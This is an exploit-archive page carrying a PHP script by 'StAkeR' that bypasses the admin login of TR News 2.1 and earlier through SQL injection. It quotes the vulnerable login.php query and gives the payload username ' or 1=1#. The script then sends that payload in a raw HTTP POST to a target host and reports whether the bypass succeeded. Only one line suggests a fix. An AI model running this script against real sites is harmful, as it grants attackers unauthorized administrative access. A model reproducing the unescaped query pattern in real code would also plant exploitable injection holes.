exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

trnews-bypass.txt

trnews-bypass.txt
Posted Nov 5, 2008
Authored by StAkeR

TR News versions 2.1 and below remote login bypass exploit that makes use of login.php.

tags | exploit, remote, php, bypass
SHA-256 | 493418d6d1dd913ffa106d667a19796cc778012055bc46d51fc928b2823b3d89
Download | Favorite | View

trnews-bypass.txt

Change Mirror Download
<?php

error_reporting(0);

/*
   ------------------------------------------------------
   TR News <= 2.1 (login.php) Remote Login ByPass Exploit
   ------------------------------------------------------
   By StAkeR[at]hotmail[dot]it
   http://www.easy-script.com/scripts-dl/trscript-21.zip

   File admin/login.php
   
   1. <?
   2.  if(isset($_POST['login_ad']) && ($_POST['password']))
   3.   {
   4.  include("../include/connexion.php");
   5.  $login=$_POST["login_ad"];
   6.  $pass=md5($_POST["password"]);
   7.  $sql="SELECT * FROM tr_user_news WHERE pseudo='$login' AND pass='$pass';";
   8.  $p = mysql_query($sql);
   9.  $row = mysql_fetch_assoc($p);
  10.  $admin = $row['admin'];
  11.  if($admin != 1)
  
  $login = $_POST"login_ad"]; isn't escaped,so you can insert SQL code...
  how to fix? sanize $login with mysql_real_escape_string or htmlentities
  
  
  NOTE:
  
  if the website is vulnerable,you must go to admin/login.php
  
  Username: ' or 1=1#
  Password: no-deface
  
*/

if(preg_match('/http://(.+?)/i',$argv[1]) or empty($argv[1])) athos();

$host = explode('/',$argv[1]);
$auth = "login_ad=%27+or+1%3D1%23&password=athos";


$data = "POST /$host[1]/admin/login.php HTTP/1.1\r\n". 
        "Host: $host[0]\r\n".
        "Content-Type: application/x-www-form-urlencoded\r\n".
        "Content-Length: ".strlen($auth)."\r\n\r\n".
        "$auth\r\n\r\n";
  
  
if(!$socket = fsockopen($host[0],80)) die("fsockopen() error!\n");  
if(!fputs($socket,$data)) die("fputs() error!\n");


while(!feof($socket))
{
  $content .= fgets($socket);
} fclose($socket);

if(preg_match("/location: main\.php\?mode=main/i",$content))
{
  exploiting();
  echo "\n[+] Exploit Successfully!\n[+] Site Vulnerable\n";
  exit;
}
else
{
  exploiting();
  echo "\n[+] Exploit Failed!\n[+] Site Not Vulnerable!\n";
  exit;
}
  
function athos()
{
  global $argv;
  
  echo "[+] TR News <= 2.1 (login.php) Remote Login ByPass Exploit\n";
  echo "[+] Usage: php $argv[0] [host/path]\r\n";
  exit;
}
  
function exploiting()
{
  echo "[+] Exploiting";

  for($i=0;$i<=3;$i++) 
  {
    echo "."; 
    sleep(1);
  }
}

Login or Register to add favorites

File Archive:

November 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Nov 1st
    30 Files
  • 2
    Nov 2nd
    0 Files
  • 3
    Nov 3rd
    0 Files
  • 4
    Nov 4th
    12 Files
  • 5
    Nov 5th
    44 Files
  • 6
    Nov 6th
    18 Files
  • 7
    Nov 7th
    9 Files
  • 8
    Nov 8th
    8 Files
  • 9
    Nov 9th
    3 Files
  • 10
    Nov 10th
    0 Files
  • 11
    Nov 11th
    14 Files
  • 12
    Nov 12th
    20 Files
  • 13
    Nov 13th
    69 Files
  • 14
    Nov 14th
    0 Files
  • 15
    Nov 15th
    0 Files
  • 16
    Nov 16th
    0 Files
  • 17
    Nov 17th
    0 Files
  • 18
    Nov 18th
    0 Files
  • 19
    Nov 19th
    0 Files
  • 20
    Nov 20th
    0 Files
  • 21
    Nov 21st
    0 Files
  • 22
    Nov 22nd
    0 Files
  • 23
    Nov 23rd
    0 Files
  • 24
    Nov 24th
    0 Files
  • 25
    Nov 25th
    0 Files
  • 26
    Nov 26th
    0 Files
  • 27
    Nov 27th
    0 Files
  • 28
    Nov 28th
    0 Files
  • 29
    Nov 29th
    0 Files
  • 30
    Nov 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2024 Packet Storm. All rights reserved.

Site Links
News by Month
News Tags
Files by Month
File Tags
File Directory
About Us
History & Purpose
Contact Information
Terms of Service
Privacy Statement
Copyright Information
Services
Security Services
Hosting By
Rokasec
close